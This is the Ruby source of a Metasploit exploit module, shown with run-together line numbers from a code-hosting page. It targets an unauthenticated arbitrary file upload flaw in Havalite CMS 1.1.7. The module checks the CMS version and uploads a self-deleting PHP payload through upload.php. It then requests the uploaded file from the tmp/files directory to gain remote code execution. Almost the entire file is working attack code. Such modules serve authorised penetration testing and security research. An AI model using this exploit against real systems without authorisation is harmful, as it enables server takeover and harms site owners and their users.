Path: blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb
24491 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::PhpEXE1011def initialize(info = {})12super(13update_info(14info,15'Name' => "Havalite CMS Arbitary File Upload Vulnerability",16'Description' => %q{17This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and18possibly prior. Attackers can abuse the upload feature in order to upload a19malicious PHP file without authentication, which results in arbitrary remote code20execution.21},22'License' => MSF_LICENSE,23'Author' => [24'CWH',25'sinn3r' # Metasploit26],27'References' => [28['CVE', '2013-10055'],29['OSVDB', '94405'],30['EDB', '26243']31],32'Payload' => {33'BadChars' => "\x00"34},35'Platform' => %w{linux php},36'Targets' => [37[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],38[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]39],40'Privileged' => false,41'DisclosureDate' => '2013-06-17',42'DefaultTarget' => 0,43'Notes' => {44'Reliability' => UNKNOWN_RELIABILITY,45'Stability' => UNKNOWN_STABILITY,46'SideEffects' => UNKNOWN_SIDE_EFFECTS47}48)49)5051register_options(52[53OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])54]55)56end5758#59# Checks if target is running HavaLite CMS 1.1.760# We only flag 1.1.7 as vulnerable, because we don't have enough information from61# the vendor or OSVDB about exactly which ones are really vulnerable.62#63def check64uri = normalize_uri(target_uri.path, 'havalite/')65res = send_request_raw({ 'uri' => uri })6667if not res68vprint_error("Connection timed out")69return Exploit::CheckCode::Unknown70end7172js_src = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten[0] || ''73version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''7475if not version.empty? and version =~ /1\.1\.7/76vprint_status("Version found: #{version}")77return Exploit::CheckCode::Appears78end7980Exploit::CheckCode::Safe81end8283#84# Uploads our malicious file85#86def upload(base)87p = get_write_exec_payload(:unlink_self => true)88fname = "#{rand_text_alpha(5)}.php"8990data = Rex::MIME::Message.new91data.add_part(p, "application/octet-stream", nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")92post_data = data.to_s9394res = send_request_cgi({95'method' => 'POST',96'uri' => normalize_uri(base, 'havalite', 'upload.php'),97'ctype' => "multipart/form-data; boundary=#{data.bound}",98'data' => post_data99})100101if not res102fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")103elsif res.code.to_i == 404104fail_with(Failure::NotFound, "#{peer} - No upload.php found")105elsif res.body =~ /"error"\:"abort"/106fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")107end108109return fname110end111112#113# Executes our uploaded malicious file114#115def exec(base, payload_fname)116res = send_request_raw({117'uri' => normalize_uri(base, 'havalite', 'tmp', 'files', payload_fname)118})119120if res and res.code == 404121fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")122end123end124125def exploit126base = target_uri.path127128print_status("Uploading malicious file...")129fname = upload(base)130131print_status("Executing #{fname}...")132exec(base, fname)133end134end135136137